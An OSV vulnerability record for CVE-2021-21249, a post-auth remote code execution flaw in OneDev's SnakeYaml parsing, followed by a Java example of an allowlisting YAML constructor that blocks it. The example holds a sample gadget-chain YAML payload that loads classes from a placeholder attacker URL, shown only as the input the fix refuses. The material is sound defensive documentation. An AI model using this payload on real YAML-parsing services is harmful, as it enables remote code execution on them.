{"id":"CVE-2021-21249","details":"OneDev is an all-in-one devops platform. In OneDev before version 4.0.3, there is an issue involving YAML parsing which can lead to post-auth remote code execution. In order to parse and process YAML files, OneDev uses SnakeYaml which by default (when not using `SafeConstructor`) allows the instantiation of arbitrary classes. We can leverage that to run arbitrary code by instantiating classes such as `javax.script.ScriptEngineManager` and using `URLClassLoader` to load the script engine provider, resulting in the instantiation of a user controlled class. For a full example refer to the referenced GHSA. This issue was addressed in 4.0.3 by only allowing certain known classes to be deserialized.","modified":"2026-04-11T23:33:58.070569Z","published":"2021-01-15T21:15:13.740Z","related":["GHSA-7xhq-m2q9-6hpm"],"references":[{"type":"ADVISORY","url":"https://github.com/theonedev/onedev/security/advisories/GHSA-7xhq-m2q9-6hpm"},{"type":"FIX","url":"https://github.com/theonedev/onedev/commit/d6fc4212b1ac1e9bbe3ce444e95f9af1e3ab8b66"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/theonedev/onedev","events":[{"introduced":"0"},{"fixed":"4bd71941974a1b077e955616d7ba3da6fd21670c"},{"fixed":"d6fc4212b1ac1e9bbe3ce444e95f9af1e3ab8b66"}],"database_specific":{"versions":[{"introduced":"0"},{"fixed":"4.0.3"}]}}],"versions":["2.0-beta-build119","2.0-beta-build120","2.0.0","2.0.4","2.0.5","v3.0.10","v3.0.4","v3.0.5","v3.0.6","v3.0.7","v3.0.8","v3.0.9","v3.1.0","v3.1.1","v3.1.2","v3.2.0","v3.2.1","v3.2.2","v3.2.3","v3.2.4","v4.0.0","v4.0.1","v4.0.2"],"database_specific":{"source":"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2021-21249.json","vanir_signatures_modified":"2026-04-11T23:33:58Z","vanir_signatures":[{"deprecated":false,"id":"CVE-2021-21249-d63d10ab","signature_version":"v1","target":{"file":"server-core/src/main/java/io/onedev/server/migration/VersionedYamlDoc.java","function":"getClassForNode"},"source":"https://github.com/theonedev/onedev/commit/d6fc4212b1ac1e9bbe3ce444e95f9af1e3ab8b66","signature_type":"Function","digest":{"length":500,"function_hash":"138944583206282707346070210258658676956"}},{"deprecated":false,"id":"CVE-2021-21249-d73900f5","signature_version":"v1","target":{"file":"server-core/src/main/java/io/onedev/server/migration/VersionedYamlDoc.java"},"source":"https://github.com/theonedev/onedev/commit/d6fc4212b1ac1e9bbe3ce444e95f9af1e3ab8b66","signature_type":"Line","digest":{"line_hashes":["153436499289623100028202239715050662465","115915853865304753235450034654323715627","149632914228724985543702452543204993450","330258844865020736759466158536195826954","30218264420128282141813729023207895605","79651283559722281834227269170174588923","67481958638170210132757743742633319559","177208284667985434480464284118351237055","43278272975787269218273933739780939672","271213121722761727289629354854205157486","296650514969552683721211666856998863689","191761389872791266373999796391993127489","184077964517491301030697574414508083617","334561922508297416658027233167176069180","275292334856693783890696798175119787859","42642406356092669798683260078101992892","182645311013766548778767828261676683932","179136324979929876389588848816877331602","170797678454750527064507878027897809930","86981088040389283246458193821701913220","7185824316401942796779046560859009182"],"threshold":0.9}}]}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}]}
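The record above describes the bug class (a default SnakeYaml `Constructor` resolving any `!!fully.qualified.Class` tag) and the shape of the fix (restricting resolution to known application classes in `getClassForNode`). The following Java program is an added illustration of both sides, written for this page; it is not OneDev's code and not the patched `VersionedYamlDoc`. It assumes SnakeYaml 1.33 on the classpath and Java 11 or later; `BuildSpec`, `AllowlistConstructor` and the `attacker.invalid` URL are hypothetical names chosen for the example.

```java
import java.util.List;
import java.util.Set;

import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.Constructor;
import org.yaml.snakeyaml.error.YAMLException;
import org.yaml.snakeyaml.nodes.Node;
import org.yaml.snakeyaml.nodes.Tag;

public class YamlAllowlistDemo {

    /** Hypothetical application type that legitimate documents are allowed to instantiate. */
    public static class BuildSpec {
        private String name;
        private List<String> steps;
        public String getName() { return name; }
        public void setName(String name) { this.name = name; }
        public List<String> getSteps() { return steps; }
        public void setSteps(List<String> steps) { this.steps = steps; }
        @Override public String toString() { return "BuildSpec{name=" + name + ", steps=" + steps + "}"; }
    }

    /**
     * Hypothetical hardened constructor: class tags are resolved only for an explicit allowlist.
     * Mirrors the approach the advisory describes (known classes only); not OneDev's implementation.
     */
    static final class AllowlistConstructor extends Constructor {
        private final Set<String> allowed;

        AllowlistConstructor(LoaderOptions options, Set<String> allowed) {
            super(options);
            this.allowed = allowed;
        }

        @Override
        protected Class<?> getClassForNode(Node node) {
            Tag tag = node.getTag();
            // typeTags holds classes the application registered via addTypeDescription; any other
            // tag must name an allowlisted class, otherwise refuse before the class is even looked up.
            if (!typeTags.containsKey(tag)) {
                String className = tag.startsWith(Tag.PREFIX) ? tag.getClassName() : tag.getValue();
                if (!allowed.contains(className)) {
                    throw new YAMLException("Refusing to instantiate class named by YAML tag: " + tag);
                }
            }
            return super.getClassForNode(node);
        }
    }

    /** Constructed sample: a legitimate document tagged with the application's own class. */
    static final String BUILD_SPEC_YAML =
        "!!" + BuildSpec.class.getName() + " {name: app, steps: [compile, test]}";

    /** Constructed sample of the gadget chain the advisory names; the URL is a non-routable placeholder. */
    static final String GADGET_YAML =
        "!!javax.script.ScriptEngineManager [\n"
      + "  !!java.net.URLClassLoader [[ !!java.net.URL [\"http://attacker.invalid/\"] ]]\n"
      + "]";

    /** Pre-fix behaviour: new Yaml() uses Constructor, which resolves any class tag on SnakeYaml 1.x. */
    static Object loadDefault(String doc) {
        return new Yaml().load(doc);
    }

    /** Post-fix behaviour: only allowlisted class tags are resolved. */
    static Object loadAllowlisted(String doc) {
        Yaml yaml = new Yaml(new AllowlistConstructor(new LoaderOptions(), Set.of(BuildSpec.class.getName())));
        return yaml.load(doc);
    }

    public static void main(String[] args) {
        System.out.println("allowlisted loader, app document: " + loadAllowlisted(BUILD_SPEC_YAML));
        try {
            loadAllowlisted(GADGET_YAML);
            System.out.println("unexpected: gadget document was accepted");
        } catch (YAMLException e) {
            System.out.println("allowlisted loader, gadget document: " + e.getMessage());
        }
        // loadDefault(GADGET_YAML) is deliberately not called: on SnakeYaml 1.x it would instantiate
        // ScriptEngineManager with a URLClassLoader pointing at the placeholder URL, which is the
        // post-auth code execution primitive the record describes.
    }
}
```

The check sits in `getClassForNode` because that is the single point where SnakeYaml turns an untrusted tag into a `Class`; denying there covers tags at any nesting depth, not just the document root. On SnakeYaml 2.x the composer additionally rejects global tags by default unless a `TagInspector` set through `LoaderOptions` permits them, so the sample is pinned to the 1.x line that the affected OneDev versions used; with 2.x you would combine that inspector with an allowlist like the one above rather than rely on either alone.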